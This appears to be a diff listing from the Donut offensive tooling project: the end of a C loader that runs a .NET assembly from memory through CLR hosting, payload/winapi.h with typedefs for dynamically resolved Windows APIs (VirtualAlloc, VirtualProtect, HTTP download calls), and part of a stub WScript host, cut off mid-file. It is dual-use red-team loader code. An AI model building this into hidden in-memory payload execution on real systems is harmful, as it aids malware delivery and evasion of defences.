287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
+0
-414
payload/winapi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 // imports from shlwapi.dll
57 typedef LSTATUS (WINAPI *SHGetValueA_t)(
58 HKEY hkey,
59 LPCSTR pszSubKey,
60 LPCSTR pszValue,
61 DWORD *pdwType,
62 void *pvData,
63 DWORD *pcbData);
64
65 // imports from mscoree.dll
66 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
67 REFCLSID clsid,
68 REFIID riid,
69 LPVOID *ppInterface);
70
71 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
72 LPCWSTR pwszVersion,
73 LPCWSTR pwszBuildFlavor,
74 REFCLSID rclsid,
75 REFIID riid,
76 LPVOID FAR *ppv);
77
78 // imports from ole32.dll
79 typedef HRESULT (WINAPI *CoInitializeEx_t)(
80 LPVOID pvReserved,
81 DWORD dwCoInit);
82
83 typedef void (WINAPI *CoUninitialize_t)(void);
84
85 typedef HRESULT (WINAPI *CoCreateInstance_t)(
86 REFCLSID rclsid,
87 LPUNKNOWN pUnkOuter,
88 DWORD dwClsContext,
89 REFIID riid,
90 LPVOID *ppv);
91
92 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
93 IUnknown *punkOuter,
94 void *pvThis,
95 ITypeInfo *ptinfo,
96 IUnknown **ppunkStdDisp);
97
98 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
99 ICreateErrorInfo **pperrinfo);
100
101 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
102 INTERFACEDATA *pidata,
103 LCID lcid,
104 ITypeInfo **pptinfo);
105
106 typedef HRESULT (WINAPI *GetErrorInfo_t)(
107 ULONG dwReserved,
108 IErrorInfo **pperrinfo);
109
110 typedef HRESULT (WINAPI *LoadTypeLib_t)(
111 LPCOLESTR szFile,
112 ITypeLib **pptlib);
113
114 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
115 LPCOLESTR szFile,
116 REGKIND regkind,
117 ITypeLib **pptlib);
118
119 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
120
121 // imports from oleaut32.dll
122 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
123 SAFEARRAY *psa,
124 UINT nDim,
125 LONG *plLbound);
126
127 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
128 SAFEARRAY *psa,
129 UINT nDim,
130 LONG *plUbound);
131
132 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
133 VARTYPE vt,
134 UINT cDims,
135 SAFEARRAYBOUND *rgsabound);
136
137 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
138 VARTYPE vt,
139 LONG lLbound,
140 ULONG cElements);
141
142 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
143 SAFEARRAY *psa,
144 LONG *rgIndices,
145 void *pv);
146
147 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
148 SAFEARRAY *psa);
149
150 typedef BSTR (WINAPI *SysAllocString_t)(
151 const OLECHAR *psz);
152
153 typedef void (WINAPI *SysFreeString_t)(
154 BSTR bstrString);
155
156 // imports from kernel32.dll
157 typedef HMODULE (WINAPI *LoadLibraryA_t)(
158 LPCSTR lpLibFileName);
159
160 typedef FARPROC (WINAPI *GetProcAddress_t)(
161 HMODULE hModule,
162 LPCSTR lpProcName);
163
164 typedef BOOL (WINAPI *AllocConsole_t)(void);
165
166 typedef BOOL (WINAPI *AttachConsole_t)(
167 DWORD dwProcessId);
168
169 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
170 PHANDLER_ROUTINE HandlerRoutine,
171 BOOL Add);
172
173 typedef HANDLE (WINAPI *GetStdHandle_t)(
174 DWORD nStdHandle);
175
176 typedef BOOL (WINAPI *SetStdHandle_t)(
177 DWORD nStdHandle,
178 HANDLE hHandle);
179
180 typedef HANDLE (WINAPI *CreateFileA_t)(
181 LPCSTR lpFileName,
182 DWORD dwDesiredAccess,
183 DWORD dwShareMode,
184 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
185 DWORD dwCreationDisposition,
186 DWORD dwFlagsAndAttributes,
187 HANDLE hTemplateFile);
188
189 typedef HANDLE (WINAPI *CreateEventA_t)(
190 LPSECURITY_ATTRIBUTES lpEventAttributes,
191 BOOL bManualReset,
192 BOOL bInitialState,
193 LPCSTR lpName);
194
195 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
196
197 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
198
199 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
200
201 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
202
203 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
204 int idHook,
205 HOOKPROC lpfn,
206 HINSTANCE hmod,
207 DWORD dwThreadId);
208
209 typedef BOOL (WINAPI *CreateProcessA_t)(
210 LPCSTR lpApplicationName,
211 LPSTR lpCommandLine,
212 LPSECURITY_ATTRIBUTES lpProcessAttributes,
213 LPSECURITY_ATTRIBUTES lpThreadAttributes,
214 BOOL bInheritHandles,
215 DWORD dwCreationFlags,
216 LPVOID lpEnvironment,
217 LPCSTR lpCurrentDirectory,
218 LPSTARTUPINFOA lpStartupInfo,
219 LPPROCESS_INFORMATION lpProcessInformation);
220
221 typedef DWORD (WINAPI *WaitForSingleObject_t)(
222 HANDLE hHandle,
223 DWORD dwMilliseconds);
224
225 // imports from wininet.dll
226 typedef BOOL (WINAPI *InternetCrackUrl_t)(
227 LPCSTR lpszUrl,
228 DWORD dwUrlLength,
229 DWORD dwFlags,
230 LPURL_COMPONENTS lpUrlComponents);
231
232 typedef HINTERNET (WINAPI *InternetOpen_t)(
233 LPCSTR lpszAgent,
234 DWORD dwAccessType,
235 LPCSTR lpszProxy,
236 LPCSTR lpszProxyBypass,
237 DWORD dwFlags);
238
239 typedef HINTERNET (WINAPI *InternetConnect_t)(
240 HINTERNET hInternet,
241 LPCSTR lpszServerName,
242 INTERNET_PORT nServerPort,
243 LPCSTR lpszUserName,
244 LPCSTR lpszPassword,
245 DWORD dwService,
246 DWORD dwFlags,
247 DWORD_PTR dwContext);
248
249 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
250 HINTERNET hConnect,
251 LPCSTR lpszVerb,
252 LPCSTR lpszObjectName,
253 LPCSTR lpszVersion,
254 LPCSTR lpszReferrer,
255 LPCSTR *lplpszAcceptTypes,
256 DWORD dwFlags,
257 DWORD_PTR dwContext);
258
259 typedef BOOL (WINAPI *InternetSetOption_t)(
260 HINTERNET hInternet,
261 DWORD dwOption,
262 LPVOID lpBuffer,
263 DWORD dwBufferLength);
264
265 typedef BOOL (WINAPI *HttpSendRequest_t)(
266 HINTERNET hRequest,
267 LPCSTR lpszHeaders,
268 DWORD dwHeadersLength,
269 LPVOID lpOptional,
270 DWORD dwOptionalLength);
271
272 typedef BOOL (WINAPI *HttpQueryInfo_t)(
273 HINTERNET hRequest,
274 DWORD dwInfoLevel,
275 LPVOID lpBuffer,
276 LPDWORD lpdwBufferLength,
277 LPDWORD lpdwIndex);
278
279 typedef BOOL (WINAPI *InternetReadFile_t)(
280 HINTERNET hFile,
281 LPVOID lpBuffer,
282 DWORD dwNumberOfBytesToRead,
283 LPDWORD lpdwNumberOfBytesRead);
284
285 typedef BOOL (WINAPI *InternetCloseHandle_t)(
286 HINTERNET hInternet);
287
288 typedef BOOL (WINAPI *CryptAcquireContext_t)(
289 HCRYPTPROV *phProv,
290 LPCSTR szContainer,
291 LPCSTR szProvider,
292 DWORD dwProvType,
293 DWORD dwFlags);
294
295 typedef void (WINAPI *GetSystemInfo_t)(
296 LPSYSTEM_INFO lpSystemInfo);
297
298 typedef SIZE_T (WINAPI *VirtualQuery_t)(
299 LPCVOID lpAddress,
300 PMEMORY_BASIC_INFORMATION lpBuffer,
301 SIZE_T dwLength);
302
303 typedef BOOL (WINAPI *VirtualProtect_t)(
304 LPVOID lpAddress,
305 SIZE_T dwSize,
306 DWORD flNewProtect,
307 PDWORD lpflOldProtect);
308
309 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
310 LPCSTR lpModuleName);
311
312 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
313 LPCSTR lpLibFileName,
314 HANDLE hFile,
315 DWORD dwFlags);
316
317 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
318 LPCWSTR lpLibFileName,
319 HANDLE hFile,
320 DWORD dwFlags);
321
322 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
323 LPCSTR pszString,
324 DWORD cchString,
325 DWORD dwFlags,
326 BYTE *pbBinary,
327 DWORD *pcbBinary,
328 DWORD *pdwSkip,
329 DWORD *pdwFlags);
330
331 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
332 DWORD dwCertEncodingType,
333 LPCSTR lpszStructType,
334 const BYTE *pbEncoded,
335 DWORD cbEncoded,
336 DWORD dwFlags,
337 PCRYPT_DECODE_PARA pDecodePara,
338 void *pvStructInfo,
339 DWORD *pcbStructInfo);
340
341 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
342 HCRYPTPROV hCryptProv,
343 DWORD dwCertEncodingType,
344 PCERT_PUBLIC_KEY_INFO pInfo,
345 HCRYPTKEY *phKey);
346
347 typedef BOOL (WINAPI *CryptCreateHash_t)(
348 HCRYPTPROV hProv,
349 ALG_ID Algid,
350 HCRYPTKEY hKey,
351 DWORD dwFlags,
352 HCRYPTHASH *phHash);
353
354 typedef BOOL (WINAPI *CryptHashData_t)(
355 HCRYPTHASH hHash,
356 const BYTE *pbData,
357 DWORD dwDataLen,
358 DWORD dwFlags);
359
360 typedef BOOL (WINAPI *CryptVerifySignature_t)(
361 HCRYPTHASH hHash,
362 const BYTE *pbSignature,
363 DWORD dwSigLen,
364 HCRYPTKEY hPubKey,
365 LPCSTR szDescription,
366 DWORD dwFlags);
367
368 typedef BOOL (WINAPI *CryptDestroyHash_t)(
369 HCRYPTHASH hHash);
370
371 typedef BOOL (WINAPI *CryptDestroyKey_t)(
372 HCRYPTKEY hKey);
373
374 typedef BOOL (WINAPI *CryptReleaseContext_t)(
375 HCRYPTPROV hProv,
376 DWORD dwFlags);
377
378 typedef LPVOID (WINAPI *VirtualAlloc_t)(
379 LPVOID lpAddress,
380 SIZE_T dwSize,
381 DWORD flAllocationType,
382 DWORD flProtect);
383
384 typedef BOOL (WINAPI *VirtualFree_t)(
385 LPVOID lpAddress,
386 SIZE_T dwSize,
387 DWORD dwFreeType);
388
389 typedef HLOCAL (WINAPI *LocalFree_t)(
390 HLOCAL hMem);
391
392 typedef HRSRC (WINAPI *FindResource_t)(
393 HMODULE hModule,
394 LPCSTR lpName,
395 LPCSTR lpType);
396
397 typedef HGLOBAL (WINAPI *LoadResource_t)(
398 HMODULE hModule,
399 HRSRC hResInfo);
400
401 typedef LPVOID (WINAPI *LockResource_t)(
402 HGLOBAL hResData);
403
404 typedef DWORD (WINAPI *SizeofResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef void (WINAPI *RtlZeroMemory_t)(
409 LPVOID Destination,
410 SIZE_T Length);
411 #endif
412
413
+0
-341
payload/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34
35 // IUnknown interface
36 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
37 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
38 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
39
40 // IDispatch interface
41 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
42 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
43 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
44 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
45
46 // IHost interface
47 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
48 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
49 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
50 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
51 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
52 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
53 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
54 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
55 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
56 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
57 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
58 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
59 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
60 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
61 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
62 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
63 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
64 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
65 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
66 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
67 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
68 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
69 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
70
71 host->m_cRef = 0;
72 host->inst = inst;
73
74 DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
75 hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
76
77 if(hr == S_OK) {
78 DPRINT("ITypeLib::GetTypeInfoOfGuid");
79
80 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
81 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
82 }
83 DPRINT("HRESULT : %08lx", hr);
84 return hr;
85 }
86
87 // Queries a COM object for a pointer to one of its interface.
88 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
89 DPRINT("WScript::QueryInterface");
90
91 if(ppv == NULL) return E_POINTER;
92
93 // we implement the following interfaces
94 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
95 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
96 IsEqualIID(&iface->inst->xIID_IHost, riid))
97 {
98 *ppv = iface;
99 return S_OK;
100 }
101 *ppv = NULL;
102 return E_NOINTERFACE;
103 }
104
105 // Increments the reference count for an interface pointer to a COM object.
106 static ULONG WINAPI Host_AddRef(IHost *iface) {
107 DPRINT("WScript::AddRef");
108
109 _InterlockedIncrement(&iface->m_cRef);
110 return iface->m_cRef;
111 }
112
113 // Decrements the reference count for an interface on a COM object.
114 static ULONG WINAPI Host_Release(IHost *iface) {
115 DPRINT("WScript::Release");
116
117 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
118 return ref;
119 }
120
121 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
122 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
123 DPRINT("WScript::GetTypeInfoCount");
124
125 if(pctinfo == NULL) return E_POINTER;
126
127 *pctinfo = 1;
128 return S_OK;
129 }
130
131 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
132 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
133 DPRINT("WScript::GetTypeInfo");
134
135 if(ppTInfo == NULL) return E_POINTER;
136
137 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
138 *ppTInfo = iface->lpTypeInfo;
139
140 return S_OK;
141 }
142
143 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
144 // which can be used on subsequent calls to Invoke.
145 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
146 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
147 DPRINT("WScript::GetIDsOfNames");
148
149 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
150 }
151
152 // Provides access to properties and methods exposed by an object.
153 // The dispatch function DispInvoke provides a standard implementation of Invoke.
154 static HRESULT WINAPI Host_Invoke(
155 IHost *iface, DISPID dispIdMember, REFIID riid,
156 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
157 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
158
159 DPRINT("WScript::Invoke");
160
161 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
162 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
163 pVarResult, pExcepInfo, puArgErr);
164
165 DPRINT("HRESULT : %08lx", hr);
166
167 return hr;
168 }
169
170 // Returns the name of the WScript object (the host executable file).
171 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
172 DPRINT("WScript::Name");
173
174 return S_OK;
175 }
176
177 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
178 DPRINT("WScript::Application");
179
180 return E_NOTIMPL;
181 }
182
183 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
184 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
185 DPRINT("WScript::FullName");
186
187 return E_NOTIMPL;
188 }
189
190 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
191 DPRINT("WScript::Path");
192
193 return E_NOTIMPL;
194 }
195
196 // Gets the script mode, or identifies the script mode.
197 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
198 DPRINT("WScript::get_Interactive");
199
200 return E_NOTIMPL;
201 }
202
203 // Sets the script mode, or identifies the script mode.
204 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
205 DPRINT("WScript::put_Interactive");
206
207 return E_NOTIMPL;
208 }
209
210 // Forces script execution to stop at any time.
211 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
212 DPRINT("WScript::Quit(%i)", ExitCode);
213
214 // if you know of a better way to do this..let me know.
215 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
216
217 return S_OK;
218 }
219
220 // Returns the file name of the currently running script.
221 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
222 DPRINT("WScript::ScriptName");
223
224 return E_NOTIMPL;
225 }
226
227 // Returns the full path of the currently running script.
228 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
229 DPRINT("WScript::ScriptFullName");
230
231 return E_NOTIMPL;
232 }
233
234 // Returns the WshArguments object (a collection of arguments).
235 static HRESULT WINAPI Host_get_Arguments(
236 IHost *iface, void **out_Arguments) { // IArguments2
237 DPRINT("WScript::Arguments");
238
239 return E_NOTIMPL;
240 }
241
242 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
243 DPRINT("WScript::Version");
244
245 return E_NOTIMPL;
246 }
247
248 // Returns the Windows Script Host build version number.
249 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
250 DPRINT("WScript::BuildVersion");
251
252 return E_NOTIMPL;
253 }
254
255 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
256 DPRINT("WScript::get_Timeout");
257
258 return E_NOTIMPL;
259 }
260
261 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
262 DPRINT("WScript::put_Timeout");
263
264 return E_NOTIMPL;
265 }
266
267 // Connects the object's event sources to functions with a given prefix.
268 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
269 IDispatch **out_Dispatch) {
270 DPRINT("WScript::CreateObject");
271
272 return E_NOTIMPL;
273 }
274
275 // Outputs text to either a message box or the command console window.
276 static HRESULT WINAPI Host_Echo(
277 IHost *iface, SAFEARRAY *args) {
278 DPRINT("WScript::Echo");
279
280 return E_NOTIMPL;
281 }
282
283 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
284 static HRESULT WINAPI Host_GetObject(
285 IHost *iface, BSTR Pathname, BSTR ProgID,
286 BSTR Prefix, IDispatch **out_Dispatch) {
287 DPRINT("WScript::GetObject");
288
289 return E_NOTIMPL;
290 }
291
292 // Disconnects a connected object's event sources.
293 static HRESULT WINAPI Host_DisconnectObject(
294 IHost *iface, IDispatch *Object) {
295 DPRINT("WScript::DisconnectObject");
296
297 return E_NOTIMPL;
298 }
299
300 // Suspends script execution for a specified length of time, then continues execution.
301 static HRESULT WINAPI Host_Sleep(
302 IHost *iface, LONG Time) {
303
304 DPRINT("WScript::Sleep");
305 iface->inst->api.Sleep((DWORD)Time);
306
307 return S_OK;
308 }
309
310 // Connects the object's event sources to functions with a given prefix.
311 static HRESULT WINAPI Host_ConnectObject(
312 IHost *iface, IDispatch *Object, BSTR Prefix) {
313 DPRINT("WScript::ConnectObject");
314
315 return E_NOTIMPL;
316 }
317
318 // Exposes the read-only input stream for the current script.
319 static HRESULT WINAPI Host_get_StdIn(
320 IHost *iface, void **ppts) { // ppts is ITextStream
321 DPRINT("WScript::StdIn");
322
323 return E_NOTIMPL;
324 }
325
326 // Exposes the write-only output stream for the current script.
327 static HRESULT WINAPI Host_get_StdOut(
